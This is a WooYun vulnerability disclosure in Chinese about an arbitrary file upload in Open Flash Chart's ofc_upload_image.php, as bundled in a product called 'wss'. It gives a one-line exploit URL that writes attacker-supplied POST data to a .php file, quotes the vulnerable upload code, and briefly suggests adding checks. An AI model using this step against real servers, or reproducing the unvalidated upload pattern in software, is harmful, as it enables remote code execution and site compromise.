乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2013-02-20: 积极联系厂商并且等待厂商认领中,细节不对外公开 2013-02-20: 厂商已经主动忽略漏洞,细节向公众公开
POST 数据漏洞文件执行任意后缀文件保存
漏洞文件/chart/php-ofc-library/ofc_upload_image.php利用:/chart/php-ofc-library/ofc_upload_image.php?name=hfy.php hfy.php 文件名Post任意数据保存位置http://localhost/chart/tmp-upload-images/hfy.php
最新版wss漏洞文件,即使是收费版本也有的,在新浪商店部署的demo~
<?php//// In Open Flash Chart -> save_image debug mode, you// will see the 'echo' text in a new window.///* print_r( $_GET );print_r( $_POST );print_r( $_FILES );print_r( $GLOBALS );print_r( $GLOBALS["HTTP_RAW_POST_DATA"] );*/// default path for the image to be stored //$default_path = '../tmp-upload-images/';if (!file_exists($default_path)) mkdir($default_path, 0777, true);// full path to the saved image including filename //$destination = $default_path . basename( $_GET[ 'name' ] ); echo 'Saving your image to: '. $destination;// print_r( $_POST );// print_r( $_SERVER );// echo $HTTP_RAW_POST_DATA;//// POST data is usually string data, but we are passing a RAW .png// so PHP is a bit confused and $_POST is empty. But it has saved// the raw bits into $HTTP_RAW_POST_DATA//$jfh = fopen($destination, 'w') or die("can't open file");fwrite($jfh, $HTTP_RAW_POST_DATA);fclose($jfh);//// LOOK://exit();//// PHP5://// default path for the image to be stored //$default_path = 'tmp-upload-images/';if (!file_exists($default_path)) mkdir($default_path, 0777, true);// full path to the saved image including filename //$destination = $default_path . basename( $_FILES[ 'Filedata' ][ 'name' ] ); // move the image into the specified directory //if (move_uploaded_file($_FILES[ 'Filedata' ][ 'tmp_name' ], $destination)) { echo "The file " . basename( $_FILES[ 'Filedata' ][ 'name' ] ) . " has been uploaded;";} else { echo "FILE UPLOAD FAILED";}?>
这个漏洞文件就是个杯具,怎么破,加权限验证,后缀等验证~,自己搞
未能联系到厂商或者厂商积极拒绝